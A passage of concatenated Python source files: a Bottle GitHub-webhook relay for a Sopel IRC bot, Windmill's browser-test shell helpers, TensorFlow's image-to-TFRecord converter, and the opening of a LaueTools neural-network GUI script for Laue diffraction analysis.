return 'Listening for webhook connections!'
@bottle.post("/webhook")
def webhook():
event = bottle.request.headers.get('X-GitHub-Event') or 'ping'
try:
payload = bottle.request.json
except:
return bottle.abort(400, 'Something went wrong!')
if event == 'ping':
channels = get_targets(payload['repository']['full_name'])
for chan in channels:
sopel_instance.msg(chan[0], '[{}] {}: {} (Your webhook is now enabled)'.format(
fmt_repo(payload['repository']['name'], chan),
fmt_name(payload['sender']['login'], chan),
payload['zen']))
return '{"channels":' + json.dumps([chan[0] for chan in channels]) + '}'
payload['event'] = event
targets = get_targets(payload['repository']['full_name'])
for row in targets:
messages = get_formatted_response(payload, row)
# Write the formatted message(s) to the channel
for message in messages:
sopel_instance.msg(row[0], message)
return '{"channels":' + json.dumps([chan[0] for chan in targets]) + '}'
@bottle.get('/auth')
def handle_auth_response():
code = bottle.request.query.code
state = bottle.request.query.state
repo = state.split(':')[0]
channel = state.split(':')[1]
data = {'client_id': sopel_instance.config.github.client_id,
'client_secret': sopel_instance.config.github.secret,
'code': code}
raw = requests.post('https://github.com/login/oauth/access_token', data=data, headers={'Accept': 'application/json'})
try:
res = json.loads(raw.text)
if 'scope' not in res:
raise ValueError('You\'ve already completed authorization on this repo')
if 'write:repo_hook' not in res['scope']:
raise ValueError('You didn\'t allow read/write on repo hooks!')
access_token = res['access_token']
data = {
"name": "web",
"active": True,
"events": ["*"],
"config": {
"url": sopel_instance.config.github.external_url,
"content_type": "json"
}
}
raw = requests.post('https://api.github.com/repos/{}/hooks?access_token={}'.format(repo, access_token), data=json.dumps(data))
res = json.loads(raw.text)
if 'ping_url' not in res:
if 'errors' in res:
raise ValueError(', '.join([error['message'] for error in res['errors']]))
else:
raise ValueError('Webhook creation failed, try again.')
raw = requests.get(res['ping_url'] + '?access_token={}'.format(access_token))
title = 'Done!'
header = 'Webhook setup complete!'
body = 'That was simple, right?! You should be seeing a completion message in {} any second now'.format(channel)
flair = 'There\'s no way it was that easy... things are never this easy...'
except Exception as e:
title = 'Error!'
header = 'Webhook setup failed!'
body = 'Please try using the link in {} again, something went wrong!'.format(channel)
flair = str(e)
page = '''
<!DOCTYPE html>
<html>
<head>
<title>{title}</title>
<style>
body {{
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}}
</style>
</head>
<body>
<h1>{header}</h1>
<p>{body}</p>
<small><em>{flair}</em></small>
</body>
</html>
'''
return page.format(title=title, header=header, body=body, flair=flair)
|
shell_objects.py
|
#!/usr/bin/env python
# Copyright (c) 2006-2007 Open Source Applications Foundation
# Copyright (c) 2008-2009 Mikeal Rogers <mikeal.rogers@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import windmill
from windmill.dep import uuid
# import sys, os, logging, re
import os, logging, re
from time import sleep
# from windmill.authoring import frame
from threading import Thread
from windmill.dep import functest
logger = logging.getLogger(__name__)
jsonrpc_client = windmill.tools.make_jsonrpc_client()
xmlrpc_client = windmill.tools.make_xmlrpc_client()
from StringIO import StringIO
test_stream_object = StringIO()
def clear_queue():
"""Clear the Service's current queue of tests/actions."""
try:
xmlrpc_client.clear_queue()
except Exception, e:
logger.debug(type(e).__name__+':'+e.message)
windmill.settings['controllers'] = []
def start_firefox():
"""Start the Firefox web browser configured for windmill"""
controller = windmill.browser.get_firefox_controller()
controller.start()
#print 'Started '+str(controller.command)
logger.info(str(controller.command))
windmill.settings['controllers'].append(controller)
return controller
def start_ie():
"""Start the Internet Explorer web browser configured for windmill"""
controller = windmill.browser.get_ie_controller()
controller.start()
windmill.settings['controllers'].append(controller)
return controller
def start_safari():
"""Start the Safari web browser configured for windmill"""
controller = windmill.browser.get_safari_controller()
controller.start()
windmill.settings['controllers'].append(controller)
return controller
def start_chrome():
"""Start the Chrome web browser configured for windmill"""
controller = windmill.browser.get_chrome_controller()
controller.start()
windmill.settings['controllers'].append(controller)
return controller
def load_json_test_file(filename):
"""Run the json test files passed to this function"""
test_strings = re.compile("\{.*\}").findall(open(filename, 'r').read())
jsonrpc_client.start_suite(filename.split(os.path.sep)[-1])
jsonrpc_client.run_json_tests(test_strings)
jsonrpc_client.stop_suite()
logger.info('Added tests from %s' % filename)
def show_queue():
"""Return the current queue of tests and commands in windmill"""
return windmill.settings['shell_objects']['httpd'].controller_queue.queue
def do_test(filename, load=False, threaded=True):
"""Run or load the test file or directory passed to this function"""
windmill.block_exit = True
if ',' in filename:
for f in filename.split(','):
do_test(f, load)
return None
def json_test(filename):
if os.path.isfile(filename) and not os.path.isfile(os.path.join(os.path.dirname(filename), '__init__.py')):
return None, load_json_test_file(filename)
else:
return os.path.dirname(os.path.abspath(filename)), [
f for f in filename.split('/') if f != ''][-1].split('.')[0]
def python_test(filename):
return os.path.abspath(filename), ''
def directory_test(filename):
return os.path.abspath(filename), ''
module_name, filter_string = {
'py': python_test,
'json': json_test
}.get(filename.split('.')[-1],directory_test)(filename)
def run_functest():
if load:
functest.registry['browser_debugging'] = "True"
xmlrpc_client.add_command({
'method': 'commands.setOptions',
'params': {'runTests':False, 'priority':'normal'}
})
functest.global_settings.test_filter = filter_string
from windmill.authoring import WindmillFunctestRunner, post_collector
functest.collector.Collector.post_collection_functions.append(post_collector)
functest.run_framework(test_args=[module_name], test_runner=WindmillFunctestRunner())
if load:
xmlrpc_client.add_command({
'method': 'commands.setOptions',
'params': {'runTests':True, 'priority':'normal'}
})
windmill.block_exit = False
if module_name is not None and threaded:
run_thread = Thread(target=run_functest)
getattr(run_thread, 'setDaemon', lambda x: x)(True)
from windmill.bin import admin_lib
admin_lib.on_ide_awake.append(run_thread.start)
return run_thread
elif module_name:
x = []
from windmill.bin import admin_lib
admin_lib.on_ide_awake.append(lambda : x.append(True))
while len(x) == 0:
sleep(1)
run_functest()
run_test = lambda filename: do_test(filename, load=False, threaded=True)
run_test.__name__ = 'run_test'
run_test.__doc__ = "Run the test file or directory passed to this function"
load_test = lambda filename: do_test(filename, load=True, threaded=True)
load_test.__name__ = 'load_test'
load_test.__doc__ = "Load the test file or directory passed to this function"
def run_js_tests(js_dir, test_filter=None, phase=None):
import windmill
from windmill.dep import wsgi_fileserver
from windmill.server import wsgi
windmill.js_framework_active = True
js_dir = os.path.abspath(os.path.expanduser(js_dir))
WSGIFileServerApplication = wsgi_fileserver.WSGIFileServerApplication
application = WSGIFileServerApplication(root_path=os.path.abspath(js_dir), mount_point='/windmill-jstest/')
wsgi.add_namespace('windmill-jstest', application)
# Build list of files and send to IDE
# base_url = windmill.settings['TEST_URL'] + '/windmill-jstest'
base_url = '/windmill-jstest'
js_files = []
def parse_files(x, directory, files):
if not os.path.split(directory)[-1].startswith('.'):
additional_dir = directory.replace(js_dir, '')
js_files.extend([additional_dir + '/' + f for f in files if f.endswith('.js')])
os.path.walk(js_dir, parse_files, 'x')
kwargs = {}
kwargs['files'] = [base_url + f for f in js_files ]
kwargs['uuid'] = str(uuid.uuid1())
if test_filter:
kwargs['filter'] = test_filter
if phase:
kwargs['phase'] = phase
xmlrpc_client.add_command({
'method':'commands.setOptions',
'params': {'scriptAppendOnly': windmill.settings['SCRIPT_APPEND_ONLY']}
})
xmlrpc_client.add_command({'method': 'commands.jsTests', 'params': kwargs})
def load_extensions_dir(dirname):
"""Mount the directory and send all javascript file links to the IDE in order to execute those test urls under the jsUnit framework"""
# Mount the fileserver application for tests
from windmill.dep import wsgi_fileserver
WSGIFileServerApplication = wsgi_fileserver.WSGIFileServerApplication
application = WSGIFileServerApplication(root_path=os.path.abspath(dirname), mount_point='/windmill-extentions/')
from windmill.server import wsgi
wsgi.add_namespace('windmill-extentions', application)
# Build list of files and send to IDE
base_url = windmill.settings['TEST_URL'] + '/windmill-extentions'
js_files = []
def parse_files(x, directory, files):
if not os.path.split(directory)[-1].startswith('.'):
additional_dir = directory.replace(dirname, '')
js_files.extend([additional_dir + '/' + f for f in files if f.endswith('.js')])
os.path.walk(dirname, parse_files, 'x')
xmlrpc_client.add_command({
'method': 'commands.loadExtensions',
'params': {'extensions':[base_url + f for f in js_files ]}
})
|
build_image_data.py
|
#!/usr/bin/python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If your data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels, one per line.
# Assumes that the file contains entries as such:
# dog
# cat
# flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number starting from 0.
tf.app.flags.DEFINE_string('labels_file', '', 'Labels file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),
'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),
'image/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename))),
'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
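def _parse_example_sketch(serialized):
  """Illustrative only (not used by this script): a minimal sketch of how a record
  written by _convert_to_example could be parsed back with TF 1.x ops. It assumes
  the feature keys above; only a few of the stored fields are pulled out here.
  """
  features = tf.parse_single_example(serialized, features={
      'image/encoded': tf.FixedLenFeature([], tf.string),
      'image/class/label': tf.FixedLenFeature([], tf.int64),
      'image/height': tf.FixedLenFeature([], tf.int64),
      'image/width': tf.FixedLenFeature([], tf.int64),
  })
  # Decode the stored JPEG bytes back into an RGB image tensor.
  image = tf.image.decode_jpeg(features['image/encoded'], channels=3)
  return image, features['image/class/label']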
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return filename.endswith('.png')
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Convert any PNG to JPEG for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
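# Illustrative values: with ranges[thread_index] = [0, 640] and
# num_shards_per_batch = 8, shard_ranges = [0, 80, 160, ..., 640], i.e. each
# shard receives roughly 80 consecutive files.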
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except Exception as e:
print(e)
print('SKIPPED: Unexpected error while decoding %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels is held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
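# Example invocation (sketch only: the script filename and paths are assumed;
# the flag names are those referenced above, and the shard counts must be
# divisible by num_threads):
#   python build_image_data.py \
#       --train_directory=/data/train --validation_directory=/data/validation \
#       --output_directory=/data/tfrecords --labels_file=/data/labels.txt \
#       --train_shards=128 --validation_shards=24 --num_threads=8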
|
lauetoolsneuralnetwork.py
|
# -*- coding: utf-8 -*-
"""
Created on June 18 06:54:04 2021
GUI routine for Laue neural network training and prediction
@author: Ravi raj purohit PURUSHOTTAM RAJ PUROHIT (purushot@esrf.fr)
@guide: jean-Sebastien MICHA (micha@esrf.fr)
Credits:
Lattice and symmetry routines are extracted and adapted from the PYMICRO and Xrayutilities repositories
TODO:
1. HDF5 file format output instead of pickle --> better data handling (check out PYMICRO)
2. Notebook to post-process the results (choice of bin width, data selectivity, etc.)
3. Dynamic multiprocessing variables?
#TODO
# Write a function that looks for pixels with no indexation that have at least 6 indexed neighbors
# the idea is to index them with their neighbors' rotation matrices?
# Also write a function to rearrange the matrices of each pixel to obtain a complete grain representation
"""
__author__ = "Ravi raj purohit PURUSHOTTAM RAJ PUROHIT, CRG-IF BM32 @ ESRF"
import warnings
warnings.filterwarnings('ignore')
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import logging
logger = logging.getLogger()
old_level = logger.level
logger.setLevel(100)
try:
import pkg_resources # part of setuptools
version_package = pkg_resources.require("lauetoolsnn")[0].version
except:
version_package = "3.0.0"
frame_title = "Laue Neural-Network model- v3 @Ravi @Jean-Sebastien \n@author: Ravi raj purohit PURUSHOTTAM RAJ PUROHIT (purushot@esrf.fr) \n@guide: Jean-Sebastien MICHA (micha@esrf.fr)"
import matplotlib
matplotlib.use('Qt5Agg')
matplotlib.rcParams.update({'font.size': 14})
import matplotlib.pyplot as plt
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
from matplotlib.figure import Figure
from matplotlib.widgets import RectangleSelector
from matplotlib import cm
import numpy as np
import itertools
import re
import glob
import _pickle as cPickle
import time, datetime
import sys
import inspect
import threading
import multiprocessing as multip
from multiprocessing import Process, Queue, cpu_count
import ast, configparser
from sklearn.metrics import classification_report
from skimage.transform import (hough_line, hough_line_peaks)
from PyQt5 import QtCore#, QtGui
from PyQt5.QtCore import QSettings
from PyQt5 import QtGui, QtWidgets
from PyQt5.QtWidgets import QApplication, QMainWindow,\
QPushButton, QWidget, QFormLayout, \
QToolBar, QStatusBar, QSlider, \
QVBoxLayout, QTextEdit, QProgressBar, \
QComboBox, QLineEdit, QFileDialog, QMenuBar,QScrollArea
# from PyQt6 import QtCore#, QtGui
# from PyQt6.QtCore import QSettings
# from PyQt6 import QtGui, QtWidgets
# from PyQt6.QtWidgets import QApplication, QMainWindow,\
# QPushButton, QWidget, QFormLayout, \
# QToolBar, QStatusBar, QSlider, \
# QVBoxLayout, QTextEdit, QProgressBar, \
# QComboBox, QLineEdit, QFileDialog, QMenuBar,QScrollArea
## for faster binning of histogram
## C version of hist
# from fast_histogram import histogram1d
## Keras import
tensorflow_keras = True
try:
import tensorflow as tf
# import keras
from keras.models import model_from_json
from keras.callbacks import EarlyStopping, ModelCheckpoint
except:
tensorflow_keras = False
## util library with MP function
try:
from utils_lauenn import Symmetry,Lattice,\
simulatemultiplepatterns, worker_generation, chunker_list,call_global,\
read_hdf5, get_ipf_colour,predict_ubmatrix, predict,\
predict_preprocessMP, global_plots, texttstr, get_material_data,\
write_training_testing_dataMTEX, SGLattice, simulate_spots, mse_images, \
generate_classHKL, rmv_freq_class, array_generator, vali_array, array_generator_verify,\
model_arch_general, worker, LoggingCallback, predict_preprocessMP_vsingle,\
computeGnomonicImage, OrientationMatrix2Euler #save_sst
except:
from lauetoolsnn.utils_lauenn import Symmetry,Lattice,\
simulatemultiplepatterns, worker_generation, chunker_list,call_global,\
read_hdf5, get_ipf_colour,predict_ubmatrix, predict,\
predict_preprocessMP, global_plots, texttstr, get_material_data,\
write_training_testing_dataMTEX, SGLattice, simulate_spots, mse_images, \
generate_classHKL, rmv_freq_class, array_generator, vali_array, array_generator_verify,\
model_arch_general, worker, LoggingCallback, predict_preprocessMP_vsingle,\
computeGnomonicImage, OrientationMatrix2Euler #save_sst
try:
from lauetools import dict_LaueTools as dictLT
from lauetools import IOLaueTools as IOLT
from lauetools import generaltools as GT
from lauetools import LaueGeometry as Lgeo
from lauetools import readmccd as RMCCD
from lauetools import IOimagefile as IOimage
from lauetools import imageprocessing as ImProc
# from lauetools import CrystalParameters as CP
except:
import lauetoolsnn.lauetools.dict_LaueTools as dictLT
import lauetoolsnn.lauetools.IOLaueTools as IOLT
import lauetoolsnn.lauetools.generaltools as GT
import lauetoolsnn.lauetools.LaueGeometry as Lgeo
import lauetoolsnn.lauetools.readmccd as RMCCD
import lauetoolsnn.lauetools.IOimagefile as IOimage
import lauetoolsnn.lauetools.imageprocessing as ImProc
# import lauetoolsnn.lauetools.CrystalParameters as CP
## Nvidia GPU drivers need to be installed! Ughh
## if wish to use only CPU set the value to -1 else set it to 0 for GPU
## CPU training is suggested (as the model requires more RAM)
try:
# Disable all GPUS
tf.config.set_visible_devices([], 'GPU')
visible_devices = tf.config.get_visible_devices()
for device in visible_devices:
assert device.device_type != 'GPU'
except:
# Invalid device or cannot modify virtual devices once initialized.
pass
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
def resource_path(relative_path, verbose=0):
""" Get absolute path to resource, works for dev and for PyInstaller """
base_path = os.path.dirname(__file__)
if verbose:
print("Base path of the library: ",base_path)
return os.path.join(base_path, relative_path)
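# Usage note: resource_path("models") returns os.path.join(<directory of this file>, "models"),
# so bundled resources are resolved relative to the installed package location.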
Logo = resource_path("lauetoolsnn_logo.png", verbose=0)
default_initialization = True
if default_initialization:
material_global = "GaN" ## same key as used in LaueTools
symmetry_global = "hexagonal"
material1_global = "Si" ## same key as used in LaueTools
symmetry1_global = "cubic"
prefix_global = ""
detectorparameters_global = [79.583,976.202,931.883,0.4411,0.3921]
pixelsize_global = 0.0734 # 0.079142 #
ccd_label_global = "sCMOS" #"MARCCD165" #"Cor"#
dim1_global = 2018 #2048 #
dim2_global = 2016 #2048 #
emax_global = 23
emin_global = 5
UB_matrix_global = 5
image_grid_globalx = 21
image_grid_globaly = 51
intensity_threshold_global = 100 #75 800
boxsize_global = 15
fit_peaks_gaussian_global = 1
FitPixelDev_global = 15
strain_label_global = "NO" ## compute and plot strains
tolerance_strain = [0.35,0.25,0.15] ## reduced tolerance for strain calculations
tolerance_strain1 = [0.35,0.25,0.15]
hkls_list_global = "[1,1,0],[1,0,0],[1,1,1]"#,[3,1,0],[5,2,9],[7,5,7],[7,5,9]"
##exp directory
if material_global == material1_global:
fn1 = material_global + prefix_global
else:
fn1 = material_global + "_" + material1_global + prefix_global
expfile_global = None #r"C:\Users\purushot\Desktop\Tungsten_olivier_data\d0-300MPa"
exp_prefix_global = None #"Wmap_WB_13sep_d0_300MPa_" #"nw2_" #None #"roi3_" #
modelfile_global = resource_path("models", verbose=0) + "//" + fn1
if material_global == material1_global:
fn1 = material_global
if exp_prefix_global == None:
exp_prefix_global = material_global + "_"
weightfile_global = modelfile_global + "//" + "model_" + material_global + ".h5"
else:
fn1 = material_global + "_" + material1_global
if exp_prefix_global == None:
exp_prefix_global = material_global + "_"+material1_global + "_"
weightfile_global = modelfile_global + "//" + "model_" + material_global + "_" + material1_global + ".h5"
main_directory = resource_path("models", verbose=0)
hkl_max_global = "5"
elements_global = "all"
freq_rmv_global = 100
hkl_max1_global = "5"
elements1_global = "all"
freq_rmv1_global = 100
maximum_angle_to_search_global = 120
step_for_binning_global = 0.1
nb_grains_per_lp_global = 2
nb_grains_per_lp1_global = 2
grains_nb_simulate_global = 500
include_scm_global = False
batch_size_global = 50
epochs_global = 5
tolerance_global = 0.5
tolerance_global1 = 0.5
model_weight_file = None
softmax_threshold_global = 0.80 # softmax_threshold
mr_threshold_global = 0.95 # match rate threshold
cap_matchrate = 0.01 * 100 ## any UB matrix providing MR less than this will be ignored
coeff = 0.10 ## should be same as cap_matchrate or no?
coeff_overlap1212 = 0.15 ##15% spots overlap to avoid bad orientation detection
NumberMaxofFits = 5000 ### Max peaks per LP
mode_spotCycle = "graphmode" ## slow: to cycle through all spots else: cycles through smartly selected pair of spots
material0_limit1212 = 100000
material1_limit1212 = 100000
use_previous_UBmatrix = False
write_mtex_file = True
misorientation_angle1 = 1
cpu_count_user = -1
strain_free_parameters = ["rotx", "roty", "rotz", "alpha", "beta", "gamma", "b", "c"]
additional_expression = ["none"]
try:
if symmetry_global =="cubic":
material0_lauegroup = "11"
elif symmetry_global =="monoclinic":
material0_lauegroup = "2"
elif symmetry_global == "hexagonal":
material0_lauegroup = "9"
elif symmetry_global == "orthorhombic":
material0_lauegroup = "3"
elif symmetry_global == "tetragonal":
material0_lauegroup = "5"
elif symmetry_global == "trigonal":
material0_lauegroup = "7"
elif symmetry_global == "triclinic":
material0_lauegroup = "1"
except:
material0_lauegroup = "11"
try:
if symmetry1_global =="cubic":
material1_lauegroup = "11"
elif symmetry1_global =="monoclinic":
material1_lauegroup = "2"
elif symmetry1_global == "hexagonal":
material1_lauegroup = "9"
elif symmetry1_global == "orthorhombic":
material1_lauegroup = "3"
